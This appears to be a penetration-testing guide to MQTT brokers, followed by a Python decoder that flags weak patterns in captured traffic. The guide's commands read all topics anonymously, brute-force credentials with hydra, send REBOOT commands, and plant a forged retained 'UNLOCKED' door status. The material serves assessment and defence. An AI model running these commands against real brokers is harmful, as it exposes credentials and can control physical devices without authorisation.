MQTT (Message Queuing Telemetry Transport) - Port 1883
Basic info
MQTT (Message Queuing Telemetry Transport) is a lightweight messaging protocol for IoT devices, using a publish-subscribe model over TCP/IP. The most popular open-source broker implementation is Mosquitto. Due to minimal configuration and often insecure deployments, MQTT services are frequently vulnerable to attack.
Key characteristics:
Default port: TCP 1883 (unencrypted), 8883 (TLS)
Stateless pub/sub model
Authentication optional
Wildcard topics and retained messages
Discovering MQTT Services via Network Scanning
Nmap Detection of MQTT Brokers
Scan for MQTT using service and version detection:
nmap -sV -p 1883,8883 --script mqtt-subscribe <target-ip>
Useful Nmap NSE scripts:
mqtt-subscribe.nse — connects and subscribes to common topics
mqtt-connect.nse — attempts anonymous authentication
Manual Enumeration with Netcat or Telnet
telnet <target-ip> 1883
A successful connection banner or acknowledgment byte from the broker confirms its presence.
Assessing Authentication and Authorization Mechanisms
Many MQTT brokers allow anonymous access by default. Check this using mosquitto_sub:
mosquitto_sub -h <target-ip> -t '#' -v
If the broker allows wildcard topic subscription without credentials, it is misconfigured and vulnerable.
Try authenticating with default or guessable credentials (here test/test):
mosquitto_sub -h <target-ip> -t '#' -v -u test -P test
Exploiting Publish and Subscribe for Information Disclosure
Read All Topics with Wildcards
mosquitto_sub -h <target-ip> -t '#' -v
This reveals:
Sensor values
Credentials sent by devices
Internal control commands
Presence of retained messages
Publishing Arbitrary Payloads
mosquitto_pub -h <target-ip> -t 'iot/device/command' -m 'REBOOT'
This could trigger real-world actions on connected devices if a device is subscribed to that topic.
Brute Forcing MQTT Credentials
Use hydra for credential brute-force:
hydra -L users.txt -P passwords.txt mqtt://<target-ip>:1883 -V
Persistent Attacks with Retained Messages
Retained messages persist even after the publisher disconnects, making them ideal for:
Persistence payloads
Credential harvesting
Fake sensor data injection
Set retained payload:
mosquitto_pub -h <target-ip> -t 'iot/door/status' -m 'UNLOCKED' -r
When a new subscriber connects, it immediately receives the forged message.
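As an added example (not code from the original page), a small MQTT 3.1.1 packet decoder that a defender can run over captured broker traffic to flag the three weak patterns discussed in the authentication, wildcard-subscription and retained-message sections above: an anonymous CONNECT, a SUBSCRIBE to a wildcard filter, and a PUBLISH with the RETAIN bit set. The sample packets are constructed by hand; the client id, topic and credentials in them are illustrative only.

```python
# Added example (not from the original page): decode raw MQTT 3.1.1 control
# packets from a capture and flag anonymous CONNECT, wildcard SUBSCRIBE
# ('#' / '+') and retained PUBLISH. All sample packets are hand-constructed.

def _remaining_length(buf, i):
    """Decode MQTT's variable-length 'remaining length' (up to 4 bytes)."""
    value, mult = 0, 1
    while True:
        b = buf[i]
        i += 1
        value += (b & 0x7F) * mult
        if not b & 0x80:
            return value, i
        mult *= 128

def _utf8_string(buf, i):
    """Decode a 2-byte big-endian length-prefixed UTF-8 string at offset i."""
    n = int.from_bytes(buf[i:i + 2], "big")
    return buf[i + 2:i + 2 + n].decode("utf-8"), i + 2 + n

def audit_packet(pkt):
    """Return a list of findings (strings) for one raw MQTT packet."""
    ptype, flags = pkt[0] >> 4, pkt[0] & 0x0F
    length, i = _remaining_length(pkt, 1)
    body = pkt[i:i + length]
    findings = []
    if ptype == 1:  # CONNECT: protocol name, level, connect flags, keep-alive
        _, j = _utf8_string(body, 0)
        connect_flags = body[j + 1]
        if not connect_flags & 0x80:  # bit 7 = username present
            findings.append("anonymous CONNECT (no username flag)")
    elif ptype == 8:  # SUBSCRIBE: packet id, then (topic filter, QoS) pairs
        j = 2
        while j < len(body):
            topic, j = _utf8_string(body, j)
            j += 1  # skip requested QoS byte
            if "#" in topic or "+" in topic:
                findings.append(f"wildcard subscription {topic!r}")
    elif ptype == 3 and flags & 0x01:  # PUBLISH with RETAIN bit set
        topic, _ = _utf8_string(body, 0)
        findings.append(f"retained PUBLISH to {topic!r}")
    return findings

# Constructed sample packets (client id "sensor1", keep-alive 60 seconds).
ANON_CONNECT = b"\x10\x13\x00\x04MQTT\x04\x02\x00\x3c\x00\x07sensor1"
AUTH_CONNECT = (b"\x10\x23\x00\x04MQTT\x04\xc2\x00\x3c\x00\x07sensor1"
                b"\x00\x06device\x00\x06secret")
WILDCARD_SUB = b"\x82\x06\x00\x01\x00\x01#\x00"
RETAINED_PUB = b"\x31\x19\x00\x0fiot/door/statusUNLOCKED"
```

Feed `audit_packet` the payload of each TCP segment to port 1883 from a capture; a non-empty result on a CONNECT or SUBSCRIBE from an unexpected client is the misconfiguration signal described above.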